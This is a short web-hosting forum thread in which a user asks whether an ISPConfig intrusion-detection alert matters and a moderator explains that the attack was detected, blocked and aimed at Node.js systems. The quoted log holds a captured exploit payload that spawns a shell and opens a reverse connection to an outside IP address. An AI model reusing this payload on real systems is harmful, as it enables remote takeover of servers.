Errors in ISPConfig Log

cmks · Feb 2, 2026

Hi team,
should I be concerned about such log entries?
regards,
cmks

[INTERFACE]: PHP IDS Alert.Total impact: 79
Affected tags: xss, csrf, dt, id, lfi, rfe, sqli

Variable: POST.0 | Value: {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{"then":"$B1337"}","_response":{"_prefix":"var n=process.mainModule.require('net'),c=process.mainModule.require('child_process'),s=c.spawn('/bin/sh',[]),cl=new n.Socket();cl.connect(12323,'193.142.147.209',()=>{cl.pipe(s.stdin);s.stdout.pipe(cl);s.stderr.pipe(cl);});","_formData":{"get":"$1:constructor:constructor"}}}
Impact: 79 | Tags: xss, csrf, dt, id, lfi, rfe, sqli
Description: Finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID 1
Description: Finds attribute breaking injections including whitespace attacks | Tags: xss, csrf | ID 2
Description: Detects hash-contained xss payload attacks, setter usage and property overloading | Tags: xss, csrf | ID 5
Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID 8
Description: Detects specific directory and path traversal | Tags: dt, id, lfi | ID 11
Description: Detects JavaScript object properties and methods | Tags: xss, csrf, id, rfe | ID 17
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID 20
Description: Detects very basic XSS probings | Tags: xss, csrf, id, rfe | ID 21
Description: Detects MySQL comments, conditions and ch(a)r injections | Tags: sqli, id, lfi | ID 40
Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID 43
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID 45
Description: Detects basic SQL authentication bypass attempts 3/3 | Tags: sqli, id, lfi | ID 46
Description: Detects MySQL comment-/space-obfuscated injections and backtick termination | Tags: sqli, id | ID 57
Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID 59
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID 67
Click to expand...

till · Feb 2, 2026

cmks said: ↑

should I be concerned about such log entries?
Click to expand...

No. The log entry shows you that ISPConfig successfully detected and prevented the attack. Besides that, it was not an attack that targeted ISPConfig, looks like an attack attempt against a node.js or similar system.

cmks · Feb 2, 2026

OK, good to know.
Maybe, "Info" or "Debug" ist than a better log level for such entries?
In my opinion, every ‘error’ entry should prompt a system administrator to take action...

Log in or Sign up

Errors in ISPConfig Log

cmks Member HowtoForge Supporter

till Super Moderator Staff Member ISPConfig Developer

cmks Member HowtoForge Supporter

Share This Page

Log in or Sign up

Errors in ISPConfig Log

cmks Member HowtoForge Supporter

till Super Moderator Staff Member ISPConfig Developer

cmks Member HowtoForge Supporter

Share This Page

Useful Searches